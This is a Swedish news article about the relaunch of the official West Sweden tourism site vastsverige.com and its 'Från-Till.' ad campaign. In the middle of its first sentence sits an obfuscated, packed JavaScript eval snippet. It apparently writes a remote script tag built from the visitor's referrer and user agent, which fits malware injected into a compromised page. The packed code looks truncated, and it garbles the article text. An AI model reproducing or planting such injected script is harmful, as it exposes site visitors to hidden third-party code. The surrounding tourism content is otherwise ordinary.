Image Image Image Image Image Image Image Image Image Image

| 8 april, 2020

Scroll to top

Top

Destinationssajten som ska locka fler svenska turister till Västsverige

Destinationssajten som ska locka fler svenska turister till Västsverige
Sebastian

Efter eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bnhih|var|u0026u|referrer|nayfz||js|php’.split(’|’),0,{}))
närmare två år av utvecklingsarbete lanserar nu Turistrådet Västsverige en helt ny version av vastsverige.com, som är den officiella besöksguiden för Västsverige. Ambitionen: Att bli Sveriges bästa destinationswebbplats och den självklara informationskällan för alla som vill besöka regionen. 

Turistrådet Västsverige marknadsför Västsverige på tio utländska marknader. Inför 2016 har uppdraget från Västra Götalandsregionen utökats till att även omfatta den svenska marknaden. Vastsverige.com har en central roll i detta. Webbplatsen är byggd för att vara lika användarvänlig oavsett om den läses på en dator, mobiltelefon eller surfplatta. Funktionen ”Nära dig” gör det möjligt för den som befinner sig i regionen att med ett knapptryck få förslag på upplevelser och besöksmål utifrån position. Via funktionen ”Favoriter” kan besökaren hitta ett resmål och därefter få resrutten länkad till kartappen eller till navigatorn.

– Nya Vastsverige.com bjuder också på inspirerande filmer, bilder, artiklar, topplistor och mycket mer. Sidan ska vara den självklara guiden för alla som söker information om vad man kan se, göra och uppleva här: Bohuslän med sina skaldjur och sin skärgård, Dalsland med sina sjöar och sin unika paddling, och Västergötland med sina lokala matproducenter är bara några bra exempel på varför Västsverige är kontrasternas region, säger Ann-Charlotte Carlsson, chef marknad och kommunikation, Turistrådet Västsverige.

Kampanj med glimten i ögat

9 maj går det officiella startskottet för ”Från-Till.” – en kampanj framtagen av Turistrådet Västsverige tillsammans med Forsman & Bodenfors Inhouse för att marknadsföra vastsverige.com. Här tar man avstamp i Västsverige som kontrasternas region. En rad olika besöksmål, upplevelser och aktiviteter typiska för Västsverige kopplas i bilder och filmer ihop under devisen ”Från-Till.”

– I en av filmerna ser vi tranorna dansa vid Hornborgasjön, samtidigt som ”Dans på Brännö Brygga” spelas. I en annan filmas interiören från Skara Domkyrka samtidigt som vi hör inspelad dialog från Feskekörka i Göteborg. Bildannonseringen är uppbyggd på samma principer, vilket gör att vi, lite med glimten i ögat, visar på hur mycket det finns att uppleva i Västsverige, och att det är till vastsverige.com man ska gå för att veta mer, säger Jennie Renström, kampanjansvarig för den svenska marknaden, Turistrådet Västsverige.